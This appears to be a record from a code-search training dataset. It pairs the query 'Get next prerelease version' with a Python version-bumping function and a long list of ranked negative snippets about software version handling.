configManagement.currentVersion()\n return f_version", "def get_latest_vsn(self):\n # The last version in the list should be the newest one.\n if len(self.versions) > 0:\n v = sorted(self.versions, key=lambda v: int(v['id']))[len(self.versions)-1]\n return self.get_version(v['id'])\n else: return None", "def test_minor_property(self):\n v1 = versions.Version(version='1.2.3', name='foo')\n expected = 2\n\n self.assertEqual(v1.minor, expected)", "def CompExtension_getDefaultVersion():\n return _libsbml.CompExtension_getDefaultVersion()", "def python_branch():\n\n return _sys_version()[2]", "def get_latest_schemaorg_version():\n tag_name = requests.get(SCHEMAORG_VERSION_URL).json()[\"tag_name\"] # \"v13.0-release\"\n mat = re.match(r\"v([\\d.]+)-release\", tag_name)\n if not mat:\n raise ValueError(f\"Unrecognized release tag name {tag_name}\")\n latest = mat.group(1)\n return latest", "def get_version_by_number(version_manager, version_number, request):\n return version_manager.versions[version_number - 1]", "def last_available_os_version(self) -> str:\n return pulumi.get(self, \"last_available_os_version\")", "def next_available_version(self):\n pattern = \"{descriptor}_{task}_v*{ext}\".format(\n descriptor=self.descriptor, task=self.task, ext=self.extension)\n matching_scenefiles = []\n try:\n for file_ in self.folder_path.files():\n if file_.name.fnmatch(pattern):\n matching_scenefiles.append(file_)\n if not matching_scenefiles:\n return 1\n except OSError as err:\n return 1\n matching_scenefiles.sort()\n latest_scenefile = matching_scenefiles[-1]\n latest_version = latest_scenefile.name.stripext().split(\"_v\")[-1]\n return int(latest_version) + 1", "def version(self):\n self.version_list[-1] = self.revision\n version = '.'.join(self.version_list)\n return version", "def get_latest_version():\n found_version = \"unknown\"\n version_re = r\"^## \\[(\\d+\\.\\d+\\.\\d+)\\]\"\n\n with open(os.path.join(__repo_root__, \"CHANGELOG.md\")) as changelog_file:\n for line in changelog_file:\n found = re.search(version_re, line)\n if found:\n found_version = found.group(1)\n break\n\n return found_version", "def get_version():\n major=c_int_t(0)\n minor=c_int_t(0)\n patch=c_int_t(0)\n safe_call(backend.get().af_get_version(c_pointer(major), c_pointer(minor), c_pointer(patch)))\n return major.value,minor.value,patch.value", "def get_last_version(self):\n version = self.get_current_version()\n\n # read the recent file list\n if version is None:\n version = self.get_version_from_recent_files()\n\n return version", "def minimum_engine_version(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"minimum_engine_version\")", "def get_next_serial(self):\n T = time.gmtime()\n base = T[0] * 10000 + T[1] * 100 + T[2]\n s_base = self.serial // 100\n if s_base < base:\n return base * 100 # New day\n else:\n return self.serial + 1 # May cause future lap", "def MultiExtension_getDefaultVersion():\n return _libsbml.MultiExtension_getDefaultVersion()", "def version():\n from MotionWise.log_proc import __version__ as log_ver\n from MotionWise.pm_measurement import __version__ as pm_ver\n from MotionWise.MotionWise_perf_proxy import __version__ as proxy_ver \n from MotionWise.MotionWise_perf_client import __version__ as client_ver \n \n ver = \"$Revision: 80204 $\".split()[1]\n batch = max([ pm_instrument.version().split('.')[-1], log_ver\n , ver, pm_ver, proxy_ver, client_ver, FP.__version__])\n return \"3.0.{}\".format(batch)" ]
[ "0.8125392", "0.763029", "0.7602886", "0.7530592", "0.7165768", "0.6980305", "0.69532543", "0.69383895", "0.6928541", "0.6895772", "0.687624", "0.6815259", "0.67866236", "0.67418855", "0.67331123", "0.66247994", "0.65771586", "0.6505136", "0.64826417", "0.64826417", "0.64775634", "0.6441131", "0.6406568", "0.6388673", "0.6371166", "0.6340279", "0.6293782", "0.6293782", "0.6293782", "0.6293782", "0.6273315", "0.6267677", "0.62665534", "0.6242912", "0.6221101", "0.62210476", "0.6181439", "0.6178918", "0.61624277", "0.6139538", "0.6104586", "0.6069426", "0.6050313", "0.604466", "0.6040736", "0.60358703", "0.60334414", "0.60334414", "0.60303", "0.6021758", "0.6021634", "0.60203236", "0.60143465", "0.59886676", "0.5988019", "0.59839934", "0.5976732", "0.59461415", "0.59377784", "0.5920487", "0.59126455", "0.59018433", "0.5891533", "0.58748984", "0.5858148", "0.58425546", "0.58392733", "0.5838453", "0.58249795", "0.5821123", "0.5811597", "0.5804549", "0.5792279", "0.5791478", "0.5788727", "0.57862973", "0.57609695", "0.57559824", "0.5748249", "0.5741664", "0.57200414", "0.57157135", "0.56990707", "0.5698615", "0.56959164", "0.5695655", "0.56924164", "0.5683863", "0.5666266", "0.5662176", "0.5653844", "0.56537", "0.56513155", "0.5625864", "0.5625863", "0.5618431", "0.5617779", "0.5616031", "0.5611801", "0.56066567" ]
0.6520823
17
Get next micro version.
def bump_micro(self: _R, inc: int = 1) -> _R: if not self.is_stable: return self.get_stable().bump_micro(inc - 1) return self._replace( BaseVersion( epoch=0, release=(self.major, self.minor, self.micro + inc), pre=None, post=None, dev=None, local=None, ) )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def next_version(v: str) -> str:\n vobj = Version(v)\n if vobj.is_prerelease:\n return str(vobj.base_version)\n vs = list(vobj.release)\n vs[1] += 1\n vs[2:] = [0] * len(vs[2:])\n s = \".\".join(map(str, vs))\n if vobj.epoch:\n s = f\"{vobj.epoch}!{s}\"\n return s", "def micros() -> int:", "def micro_Version(self):\n return tuple(map(ord, self._serial_io(b'\\x56', 2)[0:2]))", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def test_get_next_version_MINOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def test_get_next_version_PATCH(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH + 1): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR, PATCH + 1), ver)", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def test_get_next_version_MAJOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def microversion(self, microversion):\n\n self._microversion = microversion", "def increment(version):\n release_version = os.environ.get(\"RELEASE_VERSION\", None)\n if release_version is not None:\n return release_version\n if isinstance(version, LegacyVersion):\n msg = \"\"\"{0} is considered a legacy version and does not\n support automatic incrementing. Please bring your version\n numbering into PEP440 standards and then it can be\n automatically incremented.\n \"\"\"\n raise Exception(msg.format(version))\n release_type = os.environ.get(\"RELEASE_TYPE\", \"micro\")\n v = version._version\n # epoch\n epoch_name, epoch = VersionUtils.get_version_number(v, 0, None, \"!\")\n pre_name, pre = VersionUtils.get_version_number(v, 3, None, \"pre\")\n post_name, post = VersionUtils.get_version_number(v, 4, None, \"post\")\n dev_name, dev = VersionUtils.get_version_number(v, 2, None, \"dev\")\n _, major = VersionUtils.get_version_number(v[1], 0, 0)\n _, minor = VersionUtils.get_version_number(v[1], 1, None)\n _, micro = VersionUtils.get_version_number(v[1], 2, None)\n\n # Handle dev/pre/post\n if release_type == \"pre\":\n micro, post, pre = VersionUtils.process_pre(micro, post, pre)\n\n if release_type == \"post\":\n dev, post = VersionUtils.process_post(dev, post)\n\n if release_type == \"dev\":\n dev = VersionUtils.process_dev(dev)\n\n if release_type == \"micro\":\n dev, micro, minor, post, pre = VersionUtils.process_micro(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"minor\":\n dev, micro, minor, post, pre = VersionUtils.process_minor(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"major\":\n dev, major, micro, minor, post, pre = VersionUtils.process_major(\n dev, major, micro, minor, post, pre\n )\n\n # Handle Epoch\n if release_type == \"epoch\":\n dev, epoch, major, micro, minor, post, pre = VersionUtils.process_epoch(\n dev, epoch, major, micro, minor, post, pre\n )\n\n local = \"\".join(v[5] or []) or None\n\n version_list = [major, minor, micro]\n if release_type not in [\"epoch\", \"major\", \"minor\", \"micro\", \"pre\"]:\n version_list += list(v[1][3:])\n version_string = \".\".join([str(x) for x in version_list if x or x == 0])\n\n if epoch:\n version_string = str(epoch) + epoch_name + version_string\n if pre is not None:\n version_string = VersionUtils.calc_pre_version_string(\n pre, pre_name, version_string\n )\n if post is not None:\n version_string += \".\" + post_name + str(post)\n if dev is not None:\n version_string += \".\" + dev_name + str(dev)\n if local is not None:\n version_string += \".\" + str(local)\n\n return version_string", "def test_get_next_version_PATCH99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 100): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, 99)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def get_stable(self: _R) -> _R:\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor, self.micro),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def test_get_next_version_MAJOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (100, 0, 100, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((99, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_version(self):\r\n return self._arm.get_version()", "def current_version(self):\n try:\n return self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def get_version(self):\r\n\r\n return self.versions[0].number", "def previous():\n releases_list = releases()\n try:\n return releases_list[-2]\n except IndexError:\n return None", "def get_version():\n click.echo(get_current_version_number())", "def get_version_by_number(version_manager, version_number, request):\n return version_manager.versions[version_number - 1]", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def test_get_next_version_MINOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, 100, MAJOR, 100, 0): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, 99, 0)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def get_version():\n return 1", "def get_version():\n return '%d.%d.%d' % version_info", "def get_uni_version(self):\n version, major_version = None, None\n response = self.get_resource(category=VERSION, no_version=True)\n if response and response.get('version'):\n version = response['version']\n version_list = version.split('.')\n major_version = version_list[0][1:] + version_list[1]\n return version, major_version", "def get_latest_version(model: str) -> str:\n if model in {\"small\", \"medium\", \"large\"}:\n model = f\"da_dacy_{model}_trf\"\n versions = [mdl.split(\"-\")[-1] for mdl in models_url if mdl.startswith(model)]\n versions = sorted(\n versions,\n key=lambda s: [int(u) for u in s.split(\".\")],\n reverse=True,\n )\n return versions[0]", "def version_max():\n return VERSION_MAX", "def _get_version(self):", "def select_latest_micro_versions(versions):\n seen_minors = set()\n res = []\n\n for ver, _ in sorted(\n versions.items(),\n # Sort by (minor_version, upload_time) in descending order\n key=lambda x: (Version(x[0]).release[:2], x[1]),\n reverse=True,\n ):\n minor_ver = Version(ver).release[:2]\n\n if minor_ver not in seen_minors:\n seen_minors.add(minor_ver)\n res.insert(0, ver)\n\n return res", "def latestidd():\n pth, _ = run_functions.install_paths(\n version=\"8.8.0\"\n ) # works with any value in version\n dirpth = os.path.dirname(pth)\n dirpth = os.path.dirname(dirpth)\n alldirs = os.listdir(dirpth)\n eplusdirs = [dir for dir in alldirs if dir.startswith(\"EnergyPlus\")]\n maxapp = max(eplusdirs)\n ver = folder2ver(maxapp)\n return ver", "def api_version() -> APIVersion:\n return MAX_SUPPORTED_VERSION", "def get_machine_version():\n return get_file_content(\"/home/pi/.machineconfig/latest_version\")", "def get_version():\n return magpy.get_version()", "def latestidd():\n pth, _ = run_functions.install_paths(version='8.8.0') # works with any value in version\n dirpth = os.path.dirname(pth)\n dirpth = os.path.dirname(dirpth)\n alldirs = os.listdir(dirpth)\n eplusdirs = [dir for dir in alldirs if dir.startswith('EnergyPlus')]\n maxapp = max(eplusdirs)\n ver = folder2ver(maxapp)\n return ver", "def get_version(self):\n return self.__make_api_call('get/version')", "def __getattr__(self, name):\n if name in ('epoch', 'release', 'pre', ):\n return getattr(self._version, name)\n if name in ('post', 'dev'):\n attr = getattr(self._version, name)\n return attr[1] if attr else None\n if name == 'is_devrelease':\n return self.dev is not None\n\n parts = ('major', 'minor', 'micro')\n try:\n index = parts.index(name)\n except ValueError:\n raise AttributeError('{!r} object has to attribute {!r}'\n .format(type(self).__name__, name)) from None\n release = self.release\n return release[index] if len(release) >= index + 1 else 0", "def next_version(file_):\n split_file = file_.rsplit(\"_\", 1)\n name_file = split_file[0]\n version = split_file[-1]\n padding = len(version)\n\n if version.isdigit():\n next_version = int(version) + 1\n next_version = str(next_version).zfill(padding)\n\n return concat(name_file, next_version, separator=\"_\")\n else:\n e = concat(file_, \" is incorrect.\")\n raise ValueError(e)", "def get_version():\n\n with open('yubico/yubico_version.py', 'r') as f:\n match = VERSION_PATTERN.search(f.read())\n return match.group(1)", "def calculate_new_release_version(version):\n split_version_string = version.split(\".\")\n part_zero = split_version_string[0]\n part_one = int(split_version_string[1]) + 1\n part_two = split_version_string[2]\n new_version = f\"{part_zero}.{part_one}.{part_two}\"\n return new_version", "def version_min():\n return VERSION_MIN", "def version(inp):\n uptime = (arrow.now() - BOOTTIME)\n m, s = divmod(uptime.seconds, 60)\n h, m = divmod(m, 60)\n return lex.version(\n version=__version__, days=uptime.days, hours=h, minutes=m)", "def current_version(self):\n if self.current_tag:\n version = self.current_tag.lstrip('v')\n else:\n version = None\n\n if version and not version_is_valid(version):\n version = None\n\n return version", "def get_version(self):\n url = '{}/v2/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "def get_version(self):\n\t\treturn call_sdk_function('PrlApi_GetVersion')", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['orionld version']\n except Exception as e:\n pass\n return ''", "def version(self):\n\n if self.running() is True:\n return APIConsumer.get(\"/version\").content\n else:\n return None", "def get_current_version(self) -> str:\n raise NotImplementedError()", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def get_version(self):\n res = requests.get(self.base_url + '/version')\n\n return res", "def get_release(self, is_vertebrate: bool) -> int:\n ext = \"/info/data/?\" if is_vertebrate else \"/info/eg_version?\"\n ret = retry(request_json, 3, self._url, ext)\n return int(ret[\"releases\"][0] if is_vertebrate else ret[\"version\"])", "def get_version():\r\n return '.'.join((str(each) for each in VERSION[:3]))", "def latest_release_get():\n try:\n return json_response.success({'version': version.latest_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def version(self):\n data = self._ftdi.spi_read(self.VERSION_ADDR, len=1, burst='fixed')\n return data[0] & self.VERSION_MASK", "def version_number() -> int:\n return 0", "def get_version(version=None):\n if version is None:\n version = VERSION\n assert len(version) == 5\n assert version[3] in (\"alpha\", \"beta\", \"rc\", \"final\")\n\n parts = 2 if version[2] == 0 else 3\n main = \".\".join(str(digit) for digit in version[:parts])\n\n sub = \"\"\n if version[3] != \"final\":\n mapping = {\"alpha\": \"a\", \"beta\": \"b\", \"rc\": \"rc\"}\n sub = mapping[version[3]] + str(version[4])\n\n return main + sub", "def get_current_version(self):\n raise NotImplementedError(\"get_current_version is not implemented\")", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "def version(self) -> 'outputs.VersionResponse':\n return pulumi.get(self, \"version\")", "def reader_version(self):\n\n try:\n result, sw1, sw2 = self.apdu_plain(b\"\\xff\\x00\\x48\\x00\\x00\")\n if len(result) > 0:\n str_result = result + bytes([sw1]) + bytes([sw2])\n str_result = str_result.decode(\"utf-8\")\n return str_result\n except Exception as e:\n print(\"Get version error:\", e)\n return \"n/a\"", "def get_version():\n ver = '0.0.0'\n req = restcall(0, 'config', 10.0)\n if req['text'] is not None:\n try: \n tree = ET.fromstring(req['text'])\n ver = tree.findall('app_version')[0].text\n if ver is None:\n ver = '0.0.0'\n _LOGGER.info(\"ISY: firmware version: %s\", ver)\n except ET.ParseError:\n _LOGGER.error(\"No version information found on ISY.\")\n return ver", "def get_arm_version(self):\n ret = None\n build = self.parent._build\n if build is not None:\n ret = build[0]\n\n return ret", "def get_latest_release(self):\n cs = Custom_Soup(\n \"latest_release\", \"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_\" + str(self.version))\n cs.get_request()\n self.latest_release = cs.get_text()", "def choose_version(self):\n if len(self.unused_versions) == 0:\n self.unused_versions = list(range(len(self.versions)))\n idx = np.random.choice(self.unused_versions)\n self.unused_versions.remove(idx)\n version = self.versions[idx]\n return version", "def get_latest_vsn(self):\n # The last version in the list should be the newest one.\n if len(self.versions) > 0:\n v = sorted(self.versions, key=lambda v: int(v['id']))[len(self.versions)-1]\n return self.get_version(v['id'])\n else: return None", "def _fetch_old_version(self) -> None:\n if self.version is None:\n try:\n r = fetch(self.api + '?version&format=json')\n try:\n d = r.json()\n except JSONDecodeError:\n # Fallback for old versions which didn't wrap help in json\n d = {'error': {'*': r.text}}\n\n self.version = list(filter(\n lambda x: x.startswith('MediaWiki'),\n (line.strip()\n for line in d['error']['*'].split('\\n'))))[0].split()[1]\n except Exception:\n pass\n else:\n self.version = MediaWikiVersion(self.version)", "def version(self):\n self.version_list[-1] = self.revision\n version = '.'.join(self.version_list)\n return version", "def get_next_serial(self):\n T = time.gmtime()\n base = T[0] * 10000 + T[1] * 100 + T[2]\n s_base = self.serial // 100\n if s_base < base:\n return base * 100 # New day\n else:\n return self.serial + 1 # May cause future lap", "def getCurrentVersion():\n f_version = configManagement.currentVersion()\n return f_version", "def semver():\n return \".\".join([str(v) for v in VERSION])", "def get_version_number():\n return [0, 1, 0]", "def next_available_version(self):\n pattern = \"{descriptor}_{task}_v*{ext}\".format(\n descriptor=self.descriptor, task=self.task, ext=self.extension)\n matching_scenefiles = []\n try:\n for file_ in self.folder_path.files():\n if file_.name.fnmatch(pattern):\n matching_scenefiles.append(file_)\n if not matching_scenefiles:\n return 1\n except OSError as err:\n return 1\n matching_scenefiles.sort()\n latest_scenefile = matching_scenefiles[-1]\n latest_version = latest_scenefile.name.stripext().split(\"_v\")[-1]\n return int(latest_version) + 1", "def last_n_ver(seq, n):\r\n return first_n_ver(list(reversed(seq)), n)", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def get_version():\n return \".\".join([str(i) for i in config[\"version\"]])", "def latest_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"latest_version_number\")", "def _GetVersion(version_str):\n return int(version_str.split('.')[1])", "def GetVersion(self):\n return self._SendRequest(HTTP_GET, \"/version\", None, None)", "def get_version(version=VERSION, date=DATE):\n return \"JoMRS v{} Modular Rigging System | last update {}\".format(\n \".\".join([i for i in version]), \"/\".join([x for x in date])\n )", "def version():\n from MotionWise.log_proc import __version__ as log_ver\n from MotionWise.pm_measurement import __version__ as pm_ver\n from MotionWise.MotionWise_perf_proxy import __version__ as proxy_ver \n from MotionWise.MotionWise_perf_client import __version__ as client_ver \n \n ver = \"$Revision: 80204 $\".split()[1]\n batch = max([ pm_instrument.version().split('.')[-1], log_ver\n , ver, pm_ver, proxy_ver, client_ver, FP.__version__])\n return \"3.0.{}\".format(batch)", "def Hello(self):\n version = '1.5.3'\n print 'returned version number', version\n return version", "def getAPIVersion(self, req):\n import re\n import tracrpc\n match = re.match(r'([0-9]+)\\.([0-9]+)\\.([0-9]+)', tracrpc.__version__)\n return map(int, match.groups())", "def get_version():\r\n return __version__", "def get_current_release():\n return _CURRENT_RELEASE", "def get_ver(self, bootdefault):\n module = 'version/oper'\n method = 'GET'\n response = self.axapi_call(module, method)\n installedver = response.json()['version']['oper'][bootdefault]\n print(self.device + ' The version currently installed on ' + bootdefault + ' is: ' + installedver)", "def get_version(self):\n pass", "def get_version():\n return '.'.join(map(str, VERSION))", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def _get_next_work_file_version(self, work_template, fields):\n existing_versions = self.parent.tank.paths_from_template(work_template, fields, [\"version\"])\n version_numbers = [work_template.get_fields(v).get(\"version\") for v in existing_versions]\n curr_v_no = fields[\"version\"]\n max_v_no = max(version_numbers)\n return max(curr_v_no, max_v_no) + 1", "def get_version(self):\n return self.http_call(\"get\", url=f\"{self.base_url}/version\").json()", "def query_version(self):\n return self.connection.cursor().execute('SELECT version()').fetchone()[0]", "def get_version(self) -> str:\n self.serial.write(b\"B!\")\n serial_number = self.__extract_string(self.__read_response(1)[0], b\"!V\")\n return serial_number", "def get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def Version(self) -> _n_0_t_12:", "def Version(self) -> _n_0_t_12:" ]
[ "0.6825203", "0.6565859", "0.6408749", "0.6236738", "0.6216092", "0.60519856", "0.60511297", "0.6045051", "0.5854707", "0.5835003", "0.58286273", "0.577659", "0.57726276", "0.5756602", "0.5756459", "0.5703252", "0.56749344", "0.5653698", "0.5628476", "0.5624355", "0.5614559", "0.5603638", "0.55932724", "0.5578742", "0.5536794", "0.55328876", "0.5523858", "0.5514526", "0.5513861", "0.5492878", "0.54846454", "0.5474986", "0.54634804", "0.5420669", "0.541072", "0.5403469", "0.53930324", "0.5386563", "0.53848225", "0.53381485", "0.5337033", "0.5324503", "0.531605", "0.53028476", "0.5302816", "0.5297405", "0.5295469", "0.5290586", "0.52892506", "0.52832055", "0.52692056", "0.5267888", "0.52604413", "0.5257046", "0.52557564", "0.524218", "0.5227809", "0.5224113", "0.5223514", "0.52060056", "0.5205032", "0.51966774", "0.5176045", "0.51743835", "0.5171906", "0.51687795", "0.5164635", "0.51621836", "0.5159392", "0.51570886", "0.51569515", "0.5150659", "0.5148223", "0.5134928", "0.51335585", "0.51335526", "0.5133171", "0.51302475", "0.5125939", "0.51194155", "0.51174605", "0.5115234", "0.5111017", "0.510838", "0.5107075", "0.5105755", "0.50998664", "0.50961685", "0.5094548", "0.5089275", "0.50789493", "0.5077525", "0.5076629", "0.50751156", "0.5073244", "0.5062743", "0.5062743", "0.5062743", "0.5060046", "0.5060046" ]
0.6671826
1
Get next prerelease version. If version is stable bump `micro` for a proper versioning as well. Defaults to `rc` prereleases.
def bump_prerelease( self: _R, inc: int = 1, release_type: Literal["rc", "alpha", "beta", "a", "b"] = None, bump_release: Literal["major", "minor", "micro"] = VersionParts.MICRO, ) -> _R: prerelease_type = release_type or self.prerelease_type or VersionParts.RC increment = inc if not self.base.pre else (max(self.base.pre[-1], 1) + inc) pre = (prerelease_type, increment) new_version = self._replace(self._copy_base(pre=pre)) if new_version < self: prerelease_type = release_type or VersionParts.RC new_version = self.get_stable().bump_release(bump_release) if prerelease_type != self.prerelease_type: increment = inc base = BaseVersion( epoch=0, release=new_version.base.release, pre=(prerelease_type, increment), post=None, dev=None, local=None, ) return self._replace(base)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def increment(version):\n release_version = os.environ.get(\"RELEASE_VERSION\", None)\n if release_version is not None:\n return release_version\n if isinstance(version, LegacyVersion):\n msg = \"\"\"{0} is considered a legacy version and does not\n support automatic incrementing. Please bring your version\n numbering into PEP440 standards and then it can be\n automatically incremented.\n \"\"\"\n raise Exception(msg.format(version))\n release_type = os.environ.get(\"RELEASE_TYPE\", \"micro\")\n v = version._version\n # epoch\n epoch_name, epoch = VersionUtils.get_version_number(v, 0, None, \"!\")\n pre_name, pre = VersionUtils.get_version_number(v, 3, None, \"pre\")\n post_name, post = VersionUtils.get_version_number(v, 4, None, \"post\")\n dev_name, dev = VersionUtils.get_version_number(v, 2, None, \"dev\")\n _, major = VersionUtils.get_version_number(v[1], 0, 0)\n _, minor = VersionUtils.get_version_number(v[1], 1, None)\n _, micro = VersionUtils.get_version_number(v[1], 2, None)\n\n # Handle dev/pre/post\n if release_type == \"pre\":\n micro, post, pre = VersionUtils.process_pre(micro, post, pre)\n\n if release_type == \"post\":\n dev, post = VersionUtils.process_post(dev, post)\n\n if release_type == \"dev\":\n dev = VersionUtils.process_dev(dev)\n\n if release_type == \"micro\":\n dev, micro, minor, post, pre = VersionUtils.process_micro(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"minor\":\n dev, micro, minor, post, pre = VersionUtils.process_minor(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"major\":\n dev, major, micro, minor, post, pre = VersionUtils.process_major(\n dev, major, micro, minor, post, pre\n )\n\n # Handle Epoch\n if release_type == \"epoch\":\n dev, epoch, major, micro, minor, post, pre = VersionUtils.process_epoch(\n dev, epoch, major, micro, minor, post, pre\n )\n\n local = \"\".join(v[5] or []) or None\n\n version_list = [major, minor, micro]\n if release_type not in [\"epoch\", \"major\", \"minor\", \"micro\", \"pre\"]:\n version_list += list(v[1][3:])\n version_string = \".\".join([str(x) for x in version_list if x or x == 0])\n\n if epoch:\n version_string = str(epoch) + epoch_name + version_string\n if pre is not None:\n version_string = VersionUtils.calc_pre_version_string(\n pre, pre_name, version_string\n )\n if post is not None:\n version_string += \".\" + post_name + str(post)\n if dev is not None:\n version_string += \".\" + dev_name + str(dev)\n if local is not None:\n version_string += \".\" + str(local)\n\n return version_string", "def next_version(v: str) -> str:\n vobj = Version(v)\n if vobj.is_prerelease:\n return str(vobj.base_version)\n vs = list(vobj.release)\n vs[1] += 1\n vs[2:] = [0] * len(vs[2:])\n s = \".\".join(map(str, vs))\n if vobj.epoch:\n s = f\"{vobj.epoch}!{s}\"\n return s", "def get_version(version=None):\n if version is None:\n version = VERSION\n assert len(version) == 5\n assert version[3] in (\"alpha\", \"beta\", \"rc\", \"final\")\n\n parts = 2 if version[2] == 0 else 3\n main = \".\".join(str(digit) for digit in version[:parts])\n\n sub = \"\"\n if version[3] != \"final\":\n mapping = {\"alpha\": \"a\", \"beta\": \"b\", \"rc\": \"rc\"}\n sub = mapping[version[3]] + str(version[4])\n\n return main + sub", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n 